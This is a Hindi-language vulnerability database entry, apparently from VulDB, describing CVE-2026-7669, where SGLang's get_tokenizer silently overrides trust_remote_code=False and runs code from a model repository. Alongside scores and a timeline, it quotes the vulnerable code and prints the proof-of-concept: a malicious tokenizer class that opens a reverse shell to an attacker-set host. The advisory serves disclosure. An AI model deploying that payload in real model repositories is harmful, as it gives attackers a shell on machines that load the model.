sgl-project SGLang तक 0.5.9 HuggingFace Transformer hf_transformers_utils.py get_tokenizer trust_remote_code अधिकार वृद्धि
| CVSS मेटा अस्थायी स्कोर | वर्तमान एक्सप्लॉइट मूल्य (≈) | CTI रुचि स्कोर |
|---|---|---|
| 6.9 | $0-$5k | 1.29 |
सारांश
एक सुरक्षा कमजोरी, जिसे आलोचनात्मक के रूप में वर्गीकृत किया गया है, sgl-project SGLang तक 0.5.9 में पाई गई है। प्रभावित होता है फ़ंक्शन get_tokenizer फ़ाइल python/sglang/srt/utils/hf_transformers_utils.py का घटक HuggingFace Transformer Handler का। यह संशोधन trust_remote_code आर्ग्युमेंट False डेटा Boolean का भाग होने पर अधिकार वृद्धि का कारण बन सकता है।
इस संवेदनशीलता को CVE-2026-7669 के रूप में जाना जाता है। हमला दूरस्थ रूप से शुरू किया जा सकता है। अतिरिक्त रूप से, एक एक्सप्लॉइट मौजूद है.
विवरण
एक सुरक्षा कमजोरी, जिसे आलोचनात्मक के रूप में वर्गीकृत किया गया है, sgl-project SGLang तक 0.5.9 में पाई गई है। प्रभावित होता है फ़ंक्शन get_tokenizer फ़ाइल python/sglang/srt/utils/hf_transformers_utils.py का घटक HuggingFace Transformer Handler का। यह संशोधन trust_remote_code आर्ग्युमेंट False डेटा Boolean का भाग होने पर अधिकार वृद्धि का कारण बन सकता है। CWE के माध्यम से समस्या घोषित करने पर CWE-94 मिलता है। एडवाइजरी का संक्षिप्त विवरण निम्नलिखित है:
SGLang pins transformers==5.3.0 in pyproject.toml. Every current SGLang installation is affected. Both tokenizer_mode=\"auto\" (default) and tokenizer_mode=\"slow\" are vulnerable.बग की खोज 07/04/2026 को हुई थी। इस कमजोरी को प्रकाशित किया गया था द्वारा Nicholas Gould, David Rochester (ngould and davidrochester). प्रकटीकरण में यह जानकारी है:
trust_remote_code=False is an explicit security boundary. The user sets it to prevent code execution from untrusted models. SGLang silently overrides it, executing code in a context the user explicitly prohibited.
इस संवेदनशीलता को CVE-2026-7669 के रूप में जाना जाता है। हमला दूरस्थ रूप से शुरू किया जा सकता है। टेक्निकल डिटेल्स उपलब्ध हैं. हमले की जटिलता काफी अधिक है। शोषण करना कठिन बताया गया है। इस भेद्यता की लोकप्रियता सामान्य स्तर से नीचे है। अतिरिक्त रूप से, एक एक्सप्लॉइट मौजूद है. इस एक्सप्लॉइट की जानकारी सार्वजनिक कर दी गई है और इसका इस्तेमाल किया जा सकता है। वर्तमान में एक एक्सप्लॉइट की कीमत might be approx. USD $0-$5k है। अगर T1059 की वैल्यू है, तो MITRE ATT&CK प्रोजेक्ट इस अटैक टेक्नीक को T1059 के रूप में घोषित करता है। इस भेद्यता का स्रोत यह कोड का भाग है:
# python/sglang/srt/utils/hf_transformers_utils.py:898-909
if not trust_remote_code and type(tokenizer)._name_ == "TokenizersBackend":
tokenizer = AutoTokenizer.from_pretrained(
tokenizer_name,
*args,
trust_remote_code=True,
tokenizer_revision=tokenizer_revision,
clean_up_tokenization_spaces=False,
**kwargs,
) एडवाइजरी के अनुसार:On the first call with trust_remote_code=False, transformers returns TokenizersBackend without executing the .py file. SGLang detects this, silently retries with trust_remote_code=True, and transformers executes tokenizer.py.
यह अवधारणा प्रमाण के रूप में घोषित है। डाउनलोड हेतु यह एक्सप्लॉइट github.com पर उपलब्ध है। कम से कम 25 दिनों तक इस भेद्यता को सार्वजनिक न किए गए ज़ीरो-डे एक्सप्लॉइट के रूप में संभाला गया। इस एक्सप्लॉइट का सोर्स कोड है:
import os, pathlib
from transformers import PreTrainedTokenizerFast
class MaliciousTokenizer(PreTrainedTokenizerFast):
def _init_(self, args, *kwargs):
pathlib.Path("/tmp/sglang_rce_marker").write_text("pwned")
host = os.environ.get("ATTACKER_HOST")
if host:
import socket
s = socket.socket()
s.connect((host, int(os.environ.get("ATTACKER_PORT", "4444"))))
os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2)
os.execve("/bin/sh", ["sh"], os.environ)
super()._init_(args, *kwargs) एडवाइजरी में उल्लेख किया गया है:The PoC runs 7 phases producing 29 individually testable claims. The four core proof phases isolate the bug to lines 898-909: Phase 1 confirms transformers respects False (rules out an upstream bug); Phase 1b confirms sglang with those 9 lines stripped respects False (isolates the cause); Phase 2 confirms unpatched sglang overrides it; Phase 2b confirms the strip is surgical (explicit True still loads). Phases 3-5 add slow-mode coverage, severity context, and a chain-reachability check that confirms UI:R stands and 8.8 High is the correct CVSS.
उत्पाद
प्रकार
विक्रेता
नाम
संस्करण
CPE 2.3
CPE 2.2
CVSSv4
VulDB वेक्टर: 🔒VulDB विश्वसनीयता: 🔍
CVSSv3
VulDB मेटा बेस स्कोर: 7.2VulDB मेटा अस्थायी स्कोर: 6.9
VulDB मूल स्कोर: 5.6
VulDB अस्थायी स्कोर: 5.1
VulDB वेक्टर: 🔒
VulDB विश्वसनीयता: 🔍
शोधकर्ता मूल स्कोर: 8.8
शोधकर्ता वेक्टर: 🔒
CVSSv2
| AV | AC | Au | C | I | A |
|---|---|---|---|---|---|
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| सदिश | जटिलता | प्रमाणीकरण | गोपनीयता | अखंडता | उपलब्धता |
|---|---|---|---|---|---|
| अनलॉक करना | अनलॉक करना | अनलॉक करना | अनलॉक करना | अनलॉक करना | अनलॉक करना |
| अनलॉक करना | अनलॉक करना | अनलॉक करना | अनलॉक करना | अनलॉक करना | अनलॉक करना |
| अनलॉक करना | अनलॉक करना | अनलॉक करना | अनलॉक करना | अनलॉक करना | अनलॉक करना |
VulDB मूल स्कोर: 🔒
VulDB अस्थायी स्कोर: 🔒
VulDB विश्वसनीयता: 🔍
शोधकर्ता मूल स्कोर: 🔒
शोषण
वर्ग: अधिकार वृद्धिCWE: CWE-94 / CWE-74 / CWE-707
CAPEC: 🔒
ATT&CK: 🔒
भौतिक: नहीं
स्थानीय: नहीं
दूरस्थ: हाँ
उपलब्धता: 🔒
प्रवेश: सार्वजनिक
स्थिति: अवधारणा प्रमाण
लेखक: Nicholas Gould/David Rochester (gouldnicholas/davidrxchester)
प्रोग्रामिंग भाषा: 🔒
डाउनलोड: 🔒
EPSS Score: 🔒
EPSS Percentile: 🔒
मूल्य पूर्वानुमान: 🔍
वर्तमान मूल्य अनुमान: 🔒
| 0-Day | अनलॉक करना | अनलॉक करना | अनलॉक करना | अनलॉक करना |
|---|---|---|---|---|
| आज | अनलॉक करना | अनलॉक करना | अनलॉक करना | अनलॉक करना |
खतरे की खुफिया
रुचि: 🔍सक्रिय अभिनेता: 🔍
सक्रिय APT समूह: 🔍
प्रतिव्यवस्था
सिफारिश: कोई शमन ज्ञात नहींस्थिति: 🔍
0-दिवसीय समय: 🔒
शोषण विलंब समय: 🔍
समयरेखा
07/04/2026 कमज़ोरी पाई गई07/04/2026 निर्माता को सूचित किया गया
02/05/2026 सलाह जारी की गई
02/05/2026 VulDB प्रविष्टि बनाई गई
03/05/2026 दुरुपयोग प्रकाशित
04/05/2026 VulDB अंतिम अद्यतन
स्रोत
शोधकर्ता: Nicholas Gould, David Rochester (ngould, davidrochester)स्थिति: परिभाषित नहीं
CVE: CVE-2026-7669 (🔒)
GCVE (CVE): GCVE-0-2026-7669
GCVE (VulDB): GCVE-100-360817
EUVD: 🔒
scip Labs: https://www.scip.ch/en/?labs.20161013
प्रविष्टि
बनाया गया: 02/05/2026 10:05 AMअद्यतनित: 04/05/2026 06:26 AM
परिवर्तन: 02/05/2026 10:05 AM (54), 03/05/2026 04:01 AM (1), 04/05/2026 06:23 AM (51), 04/05/2026 06:26 AM (8)
पूर्ण: 🔍
प्रेषक: ngould
संपादक: ngould
Cache ID: 216::103
जमा करें
स्वीकृत
- जमा करें #799263: sgl-project sglang <=0.5.9 Protection Mechanism Failure (द्वारा ngould)
Several companies clearly confirm that VulDB is the primary source for best vulnerability data.
अभी तक कोई टिप्पणी नहीं भाषाएँ: hi + ne + en.
टिप्पणी करने के लिए कृपया लॉगिन करें